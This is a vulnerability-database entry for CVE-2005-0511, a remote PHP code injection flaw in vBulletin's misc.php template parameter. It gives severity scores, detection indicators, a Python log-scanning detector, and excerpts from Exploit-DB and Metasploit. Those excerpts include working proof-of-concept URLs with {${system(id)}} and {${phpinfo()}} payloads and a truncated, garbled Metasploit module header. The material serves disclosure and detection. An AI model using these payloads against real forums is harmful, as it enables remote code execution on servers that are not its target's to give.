CVE-2005-0511
Published 2005-02-21
Priority P352 · high · CVSS 2.0: 7.5
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 35.82% (98.3th percentile)
misc.php for vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.
Affected
29 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jelsoft | vbulletin | — | — |
Detection & IOCs (extracted from sources)
- Detect GET requests to misc.php where the 'template' parameter contains nested variable/function injection patterns such as {${...}}
- Look for the query string pattern do=page&template= with PHP function calls (passthru, system, phpinfo) encoded or plaintext inside double-brace variable syntax
- The exploit encodes the command as a chain of chr() calls joined by dots to bypass filters; detect passthru() calls with chr()-encoded arguments in the template parameter
- The vulnerability is only triggerable when 'Add Template Name in HTML Comments' is enabled in vBulletin configuration; audit this setting as a risk indicator
- The Metasploit check method sends 'echo ownable' via the payload; presence of the string 'ownable' in the HTTP response body indicates successful code execution
- The vulnerability is only exploitable when the 'Add Template Name in HTML Comments' vBulletin option is enabled; disabling this setting mitigates the attack surface
- The Metasploit module explicitly disables HTTP::junk_slashes as it interferes with reliable exploitation
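The request-side indicators listed above, combined into one access-log check. This is an added example, not code from this entry or from any source it indexes; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
NESTED_VAR = re.compile(r"\{\s*\$\{.*?\}\s*\}", re.S)          # {${ ... }}
FUNC_CALL = re.compile(r"\b(passthru|system|phpinfo)\s*\(", re.I)
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(\s*\.\s*chr\(\s*\d+\s*\))+", re.I)

def fully_decode(value, rounds=3):
    """Strip up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the indicators matched by one access-log line ([] if none)."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/misc.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    reasons = []
    for raw in params.get("template", []):
        value = fully_decode(raw)
        for name, rx in (("nested-variable", NESTED_VAR),
                         ("php-function", FUNC_CALL),
                         ("chr-chain", CHR_CHAIN)):
            if rx.search(value) and name not in reasons:
                reasons.append(name)
    if reasons and params.get("do") == ["page"]:
        reasons.append("do=page")
    return reasons

# Constructed sample lines (combined log format), not taken from real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Feb/2005:10:01:02 +0000] "GET /forum/misc.php?do=page&template={${phpinfo()}} HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/Feb/2005:10:01:09 +0000] "GET /forum/misc.php?do=page&template=%257B%2524%257Bpassthru(chr(105).chr(100))%257D%257D HTTP/1.1" 200 733',
    '198.51.100.4 - - [22/Feb/2005:10:02:30 +0000] "GET /forum/misc.php?do=page&template=rules HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean", "<-", line.split('"')[1])
```

The repeated decoding matters because a single pass leaves a double-encoded brace as `%7B`, which the nested-variable pattern would miss.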
Exploit-DB
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
---
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'vBulletin misc.php Template Name Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in
the vBulletin web forum software. This vulnerability is only
present when the "Add Template Name in HTML Comments" option
is enabled. All versions of vBulletin prior to 3.0.7 are
affected.
},
'Author' =>
[
'
Exploit-DB
vBulletin 3.0.6 - PHP Code Injection
exploitdb·2005-02-22
---
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
Proof of concept
http://site.com/misc.php?do=page&template={${phpinfo()}}
# milw0rm.com [2005-02-22]
Metasploit
vBulletin misc.php Template Name Arbitrary Code Execution
metasploit
This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.
References
- http://marc.info/?l=bugtraq&m=110910899415763&w=2
- http://secunia.com/advisories/14326
- http://www.securityfocus.com/bid/12622
- http://www.vbulletin.com/forum/showthread.php?postid=819562